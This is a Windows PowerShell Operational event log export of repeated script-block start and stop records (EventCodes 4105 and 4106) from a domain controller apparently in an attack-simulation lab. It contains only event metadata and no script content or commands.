LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467566
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467565
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467564
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467563
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467562
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467561
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467560
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467559
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467558
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467557
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467556
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467555
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467554
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467553
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467552
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467551
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467550
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467549
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467548
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467547
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467546
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467545
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467544
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467543
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467542
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467541
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467540
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467539
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467538
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467537
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467536
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467535
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467534
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467533
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467532
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467531
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467530
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467529
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467528
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467527
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467526
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467525
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467524
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467523
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467522
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467521
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467520
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467519
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467518
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467517
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467516
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467515
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467514
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467513
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467512
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467511
Keywords=None
